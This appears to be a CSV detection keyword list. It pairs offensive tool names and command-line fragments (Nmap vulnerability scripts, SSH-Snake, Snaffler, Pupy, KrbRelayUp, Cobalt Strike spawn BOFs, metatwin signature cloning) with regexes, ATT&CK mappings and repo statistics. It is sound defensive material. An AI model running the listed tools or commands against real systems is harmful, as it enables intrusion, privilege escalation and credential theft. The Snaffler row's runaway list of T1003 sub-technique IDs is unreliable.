Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-cve2009-3103.nse*",".{0,1000}\ssmb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-cve-2017-7494.nse*",".{0,1000}\ssmb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms06-025.nse*",".{0,1000}\ssmb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms07-029.nse*",".{0,1000}\ssmb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms08-067.nse*",".{0,1000}\ssmb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms10-054.nse*",".{0,1000}\ssmb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms10-061.nse*",".{0,1000}\ssmb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms17-010.nse*",".{0,1000}\ssmb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-regsvc-dos.nse*",".{0,1000}\ssmb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-webexec.nse*",".{0,1000}\ssmb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-webexec-exploit.nse*",".{0,1000}\ssmb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-brute.nse*",".{0,1000}\ssmtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-commands.nse*",".{0,1000}\ssmtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-enum-users.nse*",".{0,1000}\ssmtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-log4shell.nse*",".{0,1000}\ssmtp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* smtp-ntlm-info.nse*",".{0,1000}\ssmtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-open-relay.nse*",".{0,1000}\ssmtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-strangeport.nse*",".{0,1000}\ssmtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2010-4344.nse*",".{0,1000}\ssmtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1720.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1764.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\ssmtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* smuggler.py*",".{0,1000}\ssmuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "* snaffler.log*",".{0,1000}\ssnaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "* snaffler.py *",".{0,1000}\ssnaffler\.py\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "* Snake.sh *",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "* Snake.sh*",".{0,1000}\sSnake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "* sniffer-detect.nse*",".{0,1000}\ssniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-brute.nse*",".{0,1000}\ssnmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-hh3c-logins.nse*",".{0,1000}\ssnmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-info.nse*",".{0,1000}\ssnmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-interfaces.nse*",".{0,1000}\ssnmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-ios-config.nse*",".{0,1000}\ssnmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-netstat.nse*",".{0,1000}\ssnmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-processes.nse*",".{0,1000}\ssnmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-sysdescr.nse*",".{0,1000}\ssnmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-services.nse*",".{0,1000}\ssnmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-shares.nse*",".{0,1000}\ssnmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-software.nse*",".{0,1000}\ssnmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-users.nse*",".{0,1000}\ssnmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SOAPHound.ADWS*",".{0,1000}\sSOAPHound\.ADWS.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* SocialBox.sh*",".{0,1000}\sSocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* socks5proxy.py*",".{0,1000}\ssocks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* socks-auth-info.nse*",".{0,1000}\ssocks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-brute.nse*",".{0,1000}\ssocks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-open-proxy.nse*",".{0,1000}\ssocks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Source c:\windows\*.exe -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\.{0,1000}\.exe\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* -Source c:\windows\system32\*.dll -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\system32\\.{0,1000}\.dll\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* spawn C:\Windows\Temp\beacon.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\beacon\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* spawn C:\Windows\Temp\loader.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\loader\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* spawn -m adcs -d * -dc *",".{0,1000}\sspawn\s\-m\sadcs\s\-d\s.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* spawn -m shadowcred -d *",".{0,1000}\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* spawn.x64.c*",".{0,1000}\sspawn\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "* spawn.x64.o*",".{0,1000}\sspawn\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. 